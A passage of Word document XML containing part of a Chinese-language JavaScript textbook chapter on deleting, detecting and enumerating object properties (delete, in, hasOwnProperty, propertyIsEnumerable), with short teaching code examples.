        <w:t>delete o.toString;//</w:t>
      </w:r>
      <w:r>
        <w:t>什么也没做（</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>是继承来的），返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete 1;//</w:t>
      </w:r>
      <w:r>
        <w:t>无意义，返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>不能删除那些可配置性为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的属性（尽管可以删除不可扩展对象的可配置属性）。某些内置对象的属性是不可配置的，比如通过变量声明和函数声明创建的全局对象的属性。在</w:t>
      </w:r>
      <w:r>
        <w:t>严格模式中，删除一个不可配置属性会报一个类型错误。在非严格模式中（以及</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中），在这些情况下的</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作会返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete Object.prototype;//</w:t>
      </w:r>
      <w:r>
        <w:t>不能删除，属性是不可配置的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var x=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个全局变量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete this.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>不能删除这个属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function f(){}//</w:t>
      </w:r>
      <w:r>
        <w:t>声明一个全局函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete this.f;//</w:t>
      </w:r>
      <w:r>
        <w:t>也不能删除全局函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>当在非严格模式中删除全局对象的可配值属性时，可以省略对全局对象的引用，直接在</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作符后跟随要删除的属性名即可：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.x=1;//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个可配置的全局属性（没有用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete x;//</w:t>
      </w:r>
      <w:r>
        <w:t>将它删除</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而在严格模式中，</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>后跟随一个非法的操作数（比如</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>），则会报一个语法错误，因此必须显式指定对象及其属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete x;//</w:t>
      </w:r>
      <w:r>
        <w:t>在严格模式下报语法错误</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete this.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>正常工作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="6_4_Jian_Ce_Shu_Xing_"/>
      <w:r>
        <w:t>6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　检测属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>对象可以看做属性的集合，我们经常会检测集合中成员的所属关系</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>判断某个属性是否存在于某个对象中。可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符、</w:t>
      </w:r>
      <w:r>
        <w:t>hasOwnPreperty()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>propertyIsEnumerable()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来完成这个工作，甚至仅通过属性查询也可以做到这一点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符的左侧是属性名（字符串），右侧是对象。如果对象的自有属性或继承属性中包含这个属性则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var o={x:1}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"x"in o;//true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>"x"</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"y"in o;//false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>"y"</w:t>
      </w:r>
      <w:r>
        <w:t>不是</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"to</w:t>
      </w:r>
      <w:r>
        <w:t>String"in o;//true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>继承</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>hasOwnProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用来检测给定的名字是否是对象的自有属性。对于继承属性它将返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.hasOwnProperty("x");//true</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>有一个自有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.hasOwnProperty("y");//false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中不存在属性</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.hasOwnProperty("toString");//false</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>是继承属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>propertyIsEnumerable()</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>hasOwnProperty()</w:t>
      </w:r>
      <w:r>
        <w:t>的增强版，只有检测到是自有属性且这个属性的可枚举性（</w:t>
      </w:r>
      <w:r>
        <w:t>enumerable attribute</w:t>
      </w:r>
      <w:r>
        <w:t>）为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>时它才返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。某些内置属性是不可枚举的。通常由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码创建的属性都是可枚举的，除非在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中使用一个特殊的方法来改变属性的可枚举性，随后会提到：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o=inherit({y:2});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.propertyIsEnumerable("x");//true:o</w:t>
      </w:r>
      <w:r>
        <w:t>有一个可枚举</w:t>
      </w:r>
      <w:r>
        <w:t>的自有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.propertyIsEnumerable("y");//false:y</w:t>
      </w:r>
      <w:r>
        <w:t>是继承来的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Object.prototype.propertyIsEnumerable("toString");//false:</w:t>
      </w:r>
      <w:r>
        <w:t>不可枚举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>除了使用</w:t>
      </w:r>
      <w:r>
        <w:t>i n</w:t>
      </w:r>
      <w:r>
        <w:t>运算符之外，另一种更简便的方法是使用</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>判断一个属性是否是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x!==undefined;//true:o</w:t>
      </w:r>
      <w:r>
        <w:t>中有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.y!==undefined;//false:o</w:t>
      </w:r>
      <w:r>
        <w:t>中没有属性</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.toString!==unde</w:t>
      </w:r>
      <w:r>
        <w:t>fined;//true:o</w:t>
      </w:r>
      <w:r>
        <w:t>继承了</w:t>
      </w:r>
      <w:r>
        <w:t>toString</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>然而有一种场景只能使用</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符而不能使用上述属性访问的方式。</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>可以区分不存在的属性和存在但值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>的属性。例如下面的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:undefined}//</w:t>
      </w:r>
      <w:r>
        <w:t>属性被显式赋值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.x!==undefined//false</w:t>
      </w:r>
      <w:r>
        <w:t>：属性存在，但值为</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.y!==undefined//false</w:t>
      </w:r>
      <w:r>
        <w:t>：属性不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"x"in o//true</w:t>
      </w:r>
      <w:r>
        <w:t>：属性存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"y"in o//false</w:t>
      </w:r>
      <w:r>
        <w:t>：属性不存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> o.x;//</w:t>
      </w:r>
      <w:r>
        <w:t>删除了属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"x"in o//false</w:t>
      </w:r>
      <w:r>
        <w:t>：属性不再存在</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，上述代码中使用的是</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>“!=”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>“!==”</w:t>
      </w:r>
      <w:r>
        <w:t>可以区分</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。有时则不必作这种区分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中含有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，且</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值不是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>o.x</w:t>
      </w:r>
      <w:r>
        <w:t>乘以</w:t>
      </w:r>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o.x!=null)o.x*=2;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>中含有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，且</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值不能转换为</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>o.x</w:t>
      </w:r>
      <w:r>
        <w:t>乘以</w:t>
      </w:r>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，则它保持不变</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(o.x)o.x*=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="6_5_Mei_Ju_Shu_Xing_"/>
      <w:r>
        <w:t>6.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　枚举属性</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了检测对象的属性是否存在，我们还会经常遍历对象的属性。通常使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环遍历，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>提供了两个更好用的替代方案。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>5.5.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　节讨论过</w:t>
      </w:r>
      <w:r>
        <w:t>for/i n</w:t>
      </w:r>
      <w:r>
        <w:t>循环，</w:t>
      </w:r>
      <w:r>
        <w:t>for/i n</w:t>
      </w:r>
      <w:r>
        <w:t>循环可以在循环体中遍历对象中所有可枚举的属性（包括自有属性和继承的属性），把属性名称赋值给循环变量。对象继承的内置方法不可枚举的，但在代码中给对象添加的属性都是可枚举的（除非用下文中提到的一个方法将它们转换为不可枚举的）。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var o={x:1,y:2,z:3};//</w:t>
      </w:r>
      <w:r>
        <w:t>三个可枚举的自有属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>o.propertyIsEnumerable("toString")//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，不可枚举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(p in o)//</w:t>
      </w:r>
      <w:r>
